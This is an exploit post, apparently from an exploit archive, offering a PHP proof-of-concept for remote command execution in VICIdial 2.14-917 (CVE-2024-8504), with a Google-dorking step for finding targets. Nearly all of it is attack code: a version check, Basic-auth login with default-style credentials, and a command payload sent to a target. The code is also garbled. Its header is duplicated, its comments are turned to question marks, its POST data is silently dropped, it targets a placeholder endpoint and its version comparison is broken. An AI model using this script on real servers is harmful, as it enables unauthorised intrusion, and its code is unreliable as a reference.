VICIdial 2.14-917 Remote Command Execution

=============================================================================================================================================
| # Title : VICIdial v =============================================================================================================================================
| # Title : VICIdial v 2.14-917 PHP Execute system commands |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.vicidial.org/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Execute system commands indirectly to bypass security restrictions.

(Related : https://packetstorm.news/files/id/181461/ Related CVE numbers: CVE-2024-8504) .

[+] Set Target : line 73

[+] Usage : php poc.php

[+] PayLoad :


<?php

class VICIdialExploit {
private $target;
private $username;
private $password;

public function __construct($target, $username, $password) {
$this->target = $target;
$this->username = $username;
$this->password = $password;
}

public function checkVulnerability() {
$url = "$this->target/agc/vicidial.php";
$response = $this->sendRequest($url);

if (!$response || strpos($response, 'VERSION:') === false) {
return "Unknown";
}

preg_match('/VERSION:\s*(\d+\.\d+)-(\d+)/', $response, $matches);
$version = isset($matches[0]) ? $matches[0] : '';

if (!$version) {
return "Unknown";
}

return version_compare($version, '2.14-917a', '<=') ? "Vulnerable" : "Safe";
}

public function exploit() {
$auth = base64_encode("$this->username:$this->password");

$headers = [
"Authorization: Basic $auth"
];

$url = "$this->target/vicidial/admin.php?ADD=3&user=$this->username";
$response = $this->sendRequest($url, $headers);

if (!$response) {
die("Failed to authenticate");
}

echo "Authenticated successfully.\n";

// ????? ??????? ???????? ???
$payload = "echo 'Hacked';"; // ??? ??????? ?????? ??????
$this->executePayload($payload);
}

private function sendRequest($url, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function executePayload($payload) {
$url = "$this->target/execute.php"; // ??? ????? ??? ??? ??????
$headers = ["Content-Type: application/x-www-form-urlencoded"];
$data = "cmd=" . urlencode($payload);

$this->sendRequest($url, $headers, $data);
echo "Payload executed.\n";
}
}

$target = "http://example.com"; // ?????? ?????? ?????
$username = "admin";
$password = "admin123";

$exploit = new VICIdialExploit($target, $username, $password);
$status = $exploit->checkVulnerability();

if ($status === "Vulnerable") {
echo "Target is vulnerable.\n";
$exploit->exploit();
} else {
echo "Target is not vulnerable.\n";
}


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================